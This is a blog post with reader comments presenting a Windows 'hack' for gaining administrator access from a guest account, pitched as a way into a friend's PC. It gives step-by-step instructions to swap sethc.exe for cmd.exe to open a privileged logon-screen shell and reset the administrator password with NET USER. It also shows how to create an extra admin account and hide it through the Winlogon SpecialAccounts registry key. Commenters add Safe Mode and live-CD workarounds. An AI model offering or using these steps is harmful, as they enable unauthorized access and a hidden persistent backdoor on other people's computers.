Recover Administrators Password through Guest account without changing the password !

Last updated on By Mohsin Patel in Windows

Ever wanted break your  AdministratorAccount if u dnt know Account Password !!!!there ? or just wanted toStep in to  your friend’s PC to make him gawk when you tell your success story of  Magic ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on…

Concept

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites

Guest account with write access to system 32.

Method 1 (Change Admin Password)

Here is how to do that -

1.Go to C:/windows/system32
2.Copy cmd.exe and paste it on desktop
3.Rename cmd.exe to sethc.exe
4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

5.Now Log out from your guest account and at the user select window,press shift key 5 times.
6.nstead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

.Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.

8.You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.

9.Congrats You have hacked admin from guest account.

Method 2 (Access admin without changing password)

Also, you can further create a new user at the command prompt by typing “NET USER KnowBest/ADD” where “KnowBest” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new “DWORD value”, write its name as the “KnowBest” (the username that you entered in the previous step),now you can live with your admin account forever :)

ABOUT Mohsin Patel

Software Developer from Bharuch.Gujarat working as a .NET developer. and a Part time Blogger.My areas of Interest are Web Development,Wordpress and SEO,Blogging

9 Comments

  1. Avik

    ma ma mia !!
    u don’t seem to have done this a million times
    but ever tried on an guest acc. u could do that …
    u dont have the privileges …
    try some other tricks and if you know an other pls reply me…

  2. deepak

    hello my dear this trick doesn’t work as access is denied in the guest account.
    we can’t copy the sethc.exe file back to system-32 .
    please give another trick
    i m waiting ……..

  3. Mohsin

    @Fatima

    Yep,This Trick was working before release of XP SP2.

    Well, Still you can crack password Using A Live CD.

    Just Boot-up with CD.Follow Steps.you will get Administrator Account Reset .. :)

    Let me know.. your Actual Situation on Xp.

    From Where ?? If you near My location then I will Personally Reset That.

    Regards :)

  4. Fatima

    Yh, thhis trick doesnt works on the guest account,
    can you please tell me if u knw any trick that would work with teh guest account,
    i will be waiting for your reply, reply ASAP
    coz i m having some problems!!!

    Thanks!!!

  5. Basset

    It worked for me. Thanks!!

  6. Imran

    hello my dear this trick doesn’t work as access is denied in the guest account.
    we can’t copy the sethc.exe file back to system-32 .
    please give another trick
    i m waiting ……..

  7. Ahmed

    for everyone that couldn’t copy to system32…
    try Safe Mode. :)

  8. Kiran

    But guest has no system32 folder access how i can reset administrator password using by guest user limited access.

  9. vikas atray

    hello my dear this trick doesn’t work as access is denied in the guest account.
    In the guest account :-we can’t copy the sethc.exe file back to system-32 .
    (there is an error of access is denied.)
    please give another trick
    i m waiting ……..

    Recover Administrators Password through Guest account without changing the password !